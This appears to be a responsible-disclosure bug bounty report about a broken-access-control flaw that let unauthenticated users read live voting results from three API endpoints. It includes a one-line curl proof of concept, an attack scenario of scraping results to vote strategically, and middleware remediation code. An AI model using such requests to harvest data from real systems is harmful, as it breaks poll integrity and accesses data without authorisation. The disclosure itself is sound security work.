BAC Private Program 2026-01-05
Real-Time Voting Results Leak via Broken Access Control
Severity: Critical | Status: Resolved
Summary
A critical failure in authorization logic allowed unauthenticated users to access real-time voting statistics. Key endpoints did not require a valid JWT or administrative privileges.
Vulnerability Details
The voting platform was designed to keep results secret until the official announcement. However, multiple API endpoints leaked this data publicly.
Affected Endpoints
| Endpoint | Expected Access | Actual Access |
|---|---|---|
| /api/voting/results/{id} | Admin only | Public |
| /api/voting/stats | Admin only | Public |
| /api/stats/widget | Internal | Public |
Proof of Concept
Any user could monitor the leaderboard without authentication:
curl -X GET "https://target.com/api/voting/results/6952bac3d321da2afb566769"
Response (Sensitive Data Exposed)
{
"category": "Best Creator",
"results": [
{ "nominee": "Candidate A", "votes": 1547 },
{ "nominee": "Candidate B", "votes": 1203 },
{ "nominee": "Candidate C", "votes": 891 }
],
"totalVotes": 3641,
"lastUpdated": "2025-03-15T14:30:00Z"
}
Attack Scenario
┌──────────────┐
│ Attacker │
└──────┬───────┘
│
▼ No auth required
┌──────────────┐
│ Scrape API │──▶ Every 5 minutes
└──────┬───────┘
│
▼
┌──────────────┐
│ Build Live │
│ Leaderboard │
└──────┬───────┘
│
▼
┌──────────────┐
│ Strategic │
│ Voting │──▶ Vote for losing candidate
└──────────────┘ to manipulate results
Impact
- Total loss of poll integrity
- Enables “strategic voting” (sniping)
- Ruins surprise of official announcement
- Potential for vote manipulation based on real-time data
Remediation
// Add authentication middleware: a valid JWT first, then a role check.
// The same chain must be mounted on /voting/stats and /stats/widget;
// fixing only this route leaves the other two endpoints public.
router.get('/voting/results/:id',
  authMiddleware, // Rejects requests without a valid JWT (401)
  adminOnly,      // Role check: rejects authenticated non-admins (403)
  async (req, res) => {
    const results = await VotingService.getResults(req.params.id);
    res.json(results);
  }
);
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.